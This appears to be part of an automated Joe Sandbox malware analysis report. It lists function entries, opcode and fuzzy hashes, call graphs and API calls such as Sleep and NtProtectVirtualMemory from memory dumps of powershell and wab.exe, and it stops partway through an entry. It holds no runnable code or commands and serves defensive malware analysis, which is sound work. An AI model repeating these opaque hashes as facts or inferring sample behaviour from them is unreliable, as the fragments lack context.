                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73551e89cacaa996969294934d13d4d624c12ca2da05eeb4f310638779511840
                                  • Instruction ID: f8c9e4b42ecf4da9bebb6629dd53767aa82ce612ec50a7f7311c6aecd7bf2a1c
                                  • Opcode Fuzzy Hash: 73551e89cacaa996969294934d13d4d624c12ca2da05eeb4f310638779511840
                                  • Instruction Fuzzy Hash: B1E0DF3054020EEFEB00DFD0D96AA7F3B39FB50305F600409E903AA246DFB48805DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0845608B Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73551e89cacaa996969294934d13d4d624c12ca2da05eeb4f310638779511840
                                  • Instruction ID: f8c9e4b42ecf4da9bebb6629dd53767aa82ce612ec50a7f7311c6aecd7bf2a1c
                                  • Opcode Fuzzy Hash: 73551e89cacaa996969294934d13d4d624c12ca2da05eeb4f310638779511840
                                  • Instruction Fuzzy Hash: B1E0DF3054020EEFEB00DFD0D96AA7F3B39FB50305F600409E903AA246DFB48805DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455DA4 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8419b2d7987d1ef15aefd076f9caa481b8b8db5579dbe142f21e615af886cf07
                                  • Instruction ID: ba6161670f88083a625c2be52a9c523fdc5422773f8cb55437798023f7185a6b
                                  • Opcode Fuzzy Hash: 8419b2d7987d1ef15aefd076f9caa481b8b8db5579dbe142f21e615af886cf07
                                  • Instruction Fuzzy Hash: 1DD0C97099520FEFEB14DFC1D6257BF7B74BB60349FB1081AC802B6243EBB446469692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0300D508 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838376879.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_300d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d70945560a80b68c131739e4611ab32a4fe6ccb2acde7b5aaf45d075c52adcb8
                                  • Instruction ID: 03f4867e74b14af9ff20153dbdc3711feb6a3ad4e54726e7d7d74d8ec1c17026
                                  • Opcode Fuzzy Hash: d70945560a80b68c131739e4611ab32a4fe6ccb2acde7b5aaf45d075c52adcb8
                                  • Instruction Fuzzy Hash: 39210672505340DFEB05DF94D9C0B2ABFA5FB88319F2485A9ED090A296C336D456CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:0.9%
                                  Dynamic/Decrypted Code Coverage:55.6%
                                  Signature Coverage:66.7%
                                  Total number of Nodes:9
                                  Total number of Limit Nodes:1
                                  execution_graph 589 24882c00 591 24882c0a 589->591 592 24882c1f LdrInitializeThunk 591->592 593 24882c11 591->593 594 24882b60 LdrInitializeThunk 596 75ee7d1 599 75ee812 596->599 597 75ee837 Sleep 597->596 598 75ee841 NtProtectVirtualMemory 598->599 599->596 599->597 599->598

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_24819B80 1 Function_24819584 2 Function_2481D386 3 Function_24882B80 4 Function_24882E80 5 Function_24885080 6 Function_2481CF89 7 Function_24882F90 8 Function_24883090 9 Function_2481CC98 10 Function_2481D69C 11 Function_24813BA7 12 Function_2481B4A7 13 Function_24882BA0 14 Function_24882CA0 15 Function_24882EA0 16 Function_24882FA0 17 Function_24813BAC 18 Function_24813BB1 19 Function_2481CBB3 20 Function_2481B4B2 21 Function_2481ACB5 22 Function_24882AB0 23 Function_24882DB0 24 Function_24882FB0 25 Function_248839B0 26 Function_2481CBB8 27 Function_24818FBF 28 Function_2481C9C1 29 Function_248835C0 30 Function_24882CC0 31 Function_24813BCF 32 Function_24811FD2 33 Function_24813FD2 34 Function_24813FD5 35 Function_2481AAD5 36 Function_2481B3D5 37 Function_24813BD4 38 Function_24811FD7 39 Function_24882AD0 40 Function_24882DD0 41 Function_24813BD9 42 Function_24811FDC 43 Function_2481B1DC 44 Function_24811FDF 45 Function_24813BDE 46 Function_248139E2 47 Function_2481AAE5 48 Function_2481CDE4 49 Function_24882BE0 50 Function_24882EE0 51 Function_24882FE0 52 Function_24811DEC 53 Function_2481AAF1 54 Function_2481D4F2 55 Function_2481DCF2 56 Function_2481E2F2 57 Function_2481AFF7 58 Function_24882DF0 59 Function_24882BF0 60 Function_24882AF0 61 Function_24882CF0 62 Function_248127FA 63 Function_24813BFA 64 Function_2481B6FC 65 Function_24813F00 66 Function_24882C0A 67 Function_24882C00 67->66 68 Function_24882D00 69 Function_2481B008 70 Function_075EE7D1 101 Function_075EE1B4 70->101 71 Function_2481AF15 72 Function_24882D10 73 Function_24883010 74 Function_24883D10 75 Function_24819919 76 Function_2481CC23 77 Function_24814522 78 Function_2481DD2A 79 Function_2481D82D 80 Function_24813C31 81 Function_2481E432 82 Function_24882D30 83 Function_24882E30 84 Function_24882F30 85 Function_24819939 86 Function_2481D43A 87 Function_2481283D 88 Function_2481CD41 89 Function_24813F40 90 Function_2481DA46 91 Function_24884340 92 Function_2481B14A 93 Function_24884650 94 Function_2481CF59 95 Function_2481DA5A 96 Function_2481225F 97 Function_24812860 98 Function_24882B60 99 Function_24882C60 100 Function_24882F60 102 Function_2481E56F 103 Function_24819973 104 Function_24882C70 105 Function_24883D70 106 Function_2481CD79 107 Function_2481D37E

                                  Executed Functions

                                  Function 075EE7D1 Relevance: 3.1, APIs: 2, Instructions: 56sleepnativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • Sleep.KERNELBASE(00000005), ref: 075EE83C
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 075EE882
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3232163067.000000000700E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0700E000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_700e000_wab.jbxd
                                  Similarity
                                  • API ID: MemoryProtectSleepVirtual
                                  • String ID:
                                  • API String ID: 3235210055-0
                                  • Opcode ID: 068993398ccff768fde3d20ba4250dc6d23ed0334ca0658cace9112dd7114050
                                  • Instruction ID: cd9d1a8284805c69b224990ba4c2d195545c2489e91a2715a84b58d013da13b2
                                  • Opcode Fuzzy Hash: 068993398ccff768fde3d20ba4250dc6d23ed0334ca0658cace9112dd7114050
                                  • Instruction Fuzzy Hash: F81157F1911301AFF7444E24C8CDB8A73A9BF11328F968196C9008F2A2E774C885CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 248835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17 248835c0-248835cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8f16e72dc68fed47d5e875ef19efe74c7463721ae690f6b390ad7bd148c1ba93
                                  • Instruction ID: 6804a76534251230167caec1ba619bfa316bc97b8945e3e49db85725e3481500
                                  • Opcode Fuzzy Hash: 8f16e72dc68fed47d5e875ef19efe74c7463721ae690f6b390ad7bd148c1ba93
                                  • Instruction Fuzzy Hash: E390023162990546D1007158495470610855BD0205F65C511B0429538D8795CA9565A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 16 24882df0-24882dfc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c3d139e1806ffdc00b728b0fd4ea6494f78808c65dbc505d97b2aab067856c33
                                  • Instruction ID: 1b77e252bbabb00866b02d0bf4e9b67d8cec7946816b32a08cba301604d22588
                                  • Opcode Fuzzy Hash: c3d139e1806ffdc00b728b0fd4ea6494f78808c65dbc505d97b2aab067856c33
                                  • Instruction Fuzzy Hash: A890023122580557D1117158494470700895BD0245F95C512B0429528D9656CA96A126
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14 24882b60-24882b6c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1d6ee2e7f2f287c90e3bedad660d01ef5dac3a788af0fb2ed073483ff3b08679
                                  • Instruction ID: ff4795e92284c86fda5e9ed90194b1171bf996c9764237506f0c238760929485
                                  • Opcode Fuzzy Hash: 1d6ee2e7f2f287c90e3bedad660d01ef5dac3a788af0fb2ed073483ff3b08679
                                  • Instruction Fuzzy Hash: 0A90027122680147410571584854616408A5BE0205B55C121F1019560DC525C9D5612A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15 24882c70-24882c7c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: aab65206597543a4f9e906199c4a38f9ee07fe70f648a84cac1f8180cae09e2a
                                  • Instruction ID: c1c338ccc5a241f9b07c448ed5d7e57b477304b8ecd162c4d5dfeb1353a6beab
                                  • Opcode Fuzzy Hash: aab65206597543a4f9e906199c4a38f9ee07fe70f648a84cac1f8180cae09e2a
                                  • Instruction Fuzzy Hash: E590023122588946D1107158884474A00855BD0305F59C511B4429628D8695C9D57126
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 10 24882c0a-24882c0f 11 24882c1f-24882c26 LdrInitializeThunk 10->11 12 24882c11-24882c18 10->12
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 873d4273f3c073eeec26be79893861a22b98eaab83b39a56f6477ab493406087
                                  • Instruction ID: 3cf9e9f3fbfba61150e1de46364082271b478736b0b26520f37e0dcb90cff6d8
                                  • Opcode Fuzzy Hash: 873d4273f3c073eeec26be79893861a22b98eaab83b39a56f6477ab493406087
                                  • Instruction Fuzzy Hash: 79B09B719159C5C9D701E7604A0871779417BD0705F15C161E2034655F4738C5D5E177
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0897FD38 Relevance: .9, Instructions: 880COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c661cce99cec34ff2007b1a6e93b3427a32ec8347f7795dabe43d169f2e9cf3
                                  • Instruction ID: 9ca9c9d46ab86ed85b6ee241fcc8da9c8c8abb2bdfb659329fadfe2d9e8ea74a
                                  • Opcode Fuzzy Hash: 4c661cce99cec34ff2007b1a6e93b3427a32ec8347f7795dabe43d169f2e9cf3
                                  • Instruction Fuzzy Hash: AE726E30250602DFCF54BF60DF59BA93B75AB49B49F0405ACE9867B2B3DB365809CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08984108 Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eeb157df87bbcfc91732da1d0c5f8f4dc5e0bb4ee753022611ea933d3a552aae
                                  • Instruction ID: d7f0d124ae0544c888d637ed483833f722f2aae8ee286558e4941c35da60334f
                                  • Opcode Fuzzy Hash: eeb157df87bbcfc91732da1d0c5f8f4dc5e0bb4ee753022611ea933d3a552aae
                                  • Instruction Fuzzy Hash: 88519F35700612DBDB25BF24DD4CB6DB7B9AF98706F0100ADE906AB3A1CB345D468B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08978700 Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74f9c0b13054e787c004682c2cd6dcbf6ce208bbb9517c204476cffccabe2f4c
                                  • Instruction ID: dc02731c2107e94ad717bb4f432818af5ba675bc97641ee79a6b19ae33156a55
                                  • Opcode Fuzzy Hash: 74f9c0b13054e787c004682c2cd6dcbf6ce208bbb9517c204476cffccabe2f4c
                                  • Instruction Fuzzy Hash: 035180357005119BDB15AB24DD8CBADB7B9AB88706F0400BDE90ABB3A1CF345D46CA9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 089788FA Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1589e8e2b159b46beb01b5ea036c300722db3e5755bcbf17bb92d006d639e37f
                                  • Instruction ID: 6284fb8e1bb5b62c5a83407e3b1621cfb721c6fe2ad6d810b01b8564842bd981
                                  • Opcode Fuzzy Hash: 1589e8e2b159b46beb01b5ea036c300722db3e5755bcbf17bb92d006d639e37f
                                  • Instruction Fuzzy Hash: 5C31A0317002119BEB247B649D5CBBD77AAAB84756F040139E942FB3E1DB749C01CA98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08984302 Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 326ce25b7d1e8210008b066c75345e64c1c14418a8f055077ee9c1b79b16ecd3
                                  • Instruction ID: bbc2fb1e18ee16271ef889fbe1eec5c349b53b2738cfefe79d6a482f3e8e0b5d
                                  • Opcode Fuzzy Hash: 326ce25b7d1e8210008b066c75345e64c1c14418a8f055077ee9c1b79b16ecd3
                                  • Instruction Fuzzy Hash: 04317035700213DBEB247B649D58BBD77AAAF84756F050139E942EB3D1DB748C028B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08978A5A Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5572fe8438d85ee2e19526aa25181d1d7c407427cb8ced85a688263d1fa5e53
                                  • Instruction ID: 7a96cf396267788b69806a8f198acf2748699baec46b4fe0791d8ee7e9781d84
                                  • Opcode Fuzzy Hash: c5572fe8438d85ee2e19526aa25181d1d7c407427cb8ced85a688263d1fa5e53
                                  • Instruction Fuzzy Hash: 81F0E232381620B7D6323B449D09F5ABB599F80F62F040036FE457B3E2DA758811C6DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08984462 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3db8bda626738f0cf0f2fa3a517e896673731513f39b0a7f53b8b696412e60d9
                                  • Instruction ID: 8e3e8cae11ac21603e5c42003375882fb52471be1cf071ab1296d1dad2950797
                                  • Opcode Fuzzy Hash: 3db8bda626738f0cf0f2fa3a517e896673731513f39b0a7f53b8b696412e60d9
                                  • Instruction Fuzzy Hash: 11F0E932340712A7D7313B545C09F5ABB599F80F62F044429FE457B3D1CA758801C6DC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0897F498 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e16d178ca8311f27cc336fdb09d46127454a2597f288a288655f2f51bd576da4
                                  • Instruction ID: b859962b841d2461b6dd5b4f1d3b65b887de21cf9d87d0c453e429f084d39a36
                                  • Opcode Fuzzy Hash: e16d178ca8311f27cc336fdb09d46127454a2597f288a288655f2f51bd576da4
                                  • Instruction Fuzzy Hash: 91D0C23224226467C3216B549D0CB827E5CEB40B61F08402ABD08A72A1CAB1CD40C2C4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08984538 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction ID: 2da6e98f5049a230f88c4a52875494edbf4faa8407fb222239a0e82f994ff6e3
                                  • Opcode Fuzzy Hash: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction Fuzzy Hash: F6D01232241265A7C3217B559D08F96BF5CEF81B65F054069BE069B261C675DC40C6D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08978B30 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction ID: 7541d93fbad16238a72424644db00443d39e0723e9cda6a06598fa0b1e51a9dc
                                  • Opcode Fuzzy Hash: dbc71043e440707c9b8065cd262169d3adcc7c18d00be0319446f40f6729d9a5
                                  • Instruction Fuzzy Hash: 4AD0C232241268A7C3212B559D0CF82BF6CEB40B62F044439FE04B7261C671DC40C2C8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08984578 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction ID: 4de0d1debea302eceae57b81bb3b61120cef123035efe887bdac31f1f154adaa
                                  • Opcode Fuzzy Hash: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction Fuzzy Hash: A6D0C232141265A7C32177548D04F867E5C8F40B66F080025BD044765085A1CC40C6C8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08978B70 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000003.3183073930.0000000008973000.00000004.00000020.00020000.00000000.sdmp, Offset: 08973000, based on PE: false
                                  • Associated: 00000011.00000003.3121968827.0000000008973000.00000004.00000020.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_3_8973000_wab.1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction ID: 1ae18c9d3e0c1f350f7e38f8a4f21c1c0daa20e540e1b789d4f97a6010fa1ae4
                                  • Opcode Fuzzy Hash: cfd5fd5db120f6979afac7d7c615b2f32ae06d6959f0ab16ad67cb83fa2cc11b
                                  • Instruction Fuzzy Hash: E1D05BB2141268A7C33177A59D08FA67F5CDBC1B66F054435BF0457291C575DC40C2D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882B80 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aff5ca15ec7a5f1ec7aacec573f51e56e27458f7899e97daf979d5baa072373e
                                  • Instruction ID: a0ec0f7238261532da8756c6e45ff5f82b85aae6b873263a1bf08fa92f330765
                                  • Opcode Fuzzy Hash: aff5ca15ec7a5f1ec7aacec573f51e56e27458f7899e97daf979d5baa072373e
                                  • Instruction Fuzzy Hash: 8090023122580946D10471584C4468600855BD0305F55C111B6029625E9665C9D57136
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 24882E80 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3306549611.0000000024810000.00000040.00001000.00020000.00000000.sdmp, Offset: 24810000, based on PE: true
                                  • Associated: 00000011.00000002.3306549611.0000000024939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.000000002493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000011.00000002.3306549611.00000000249AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_24810000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
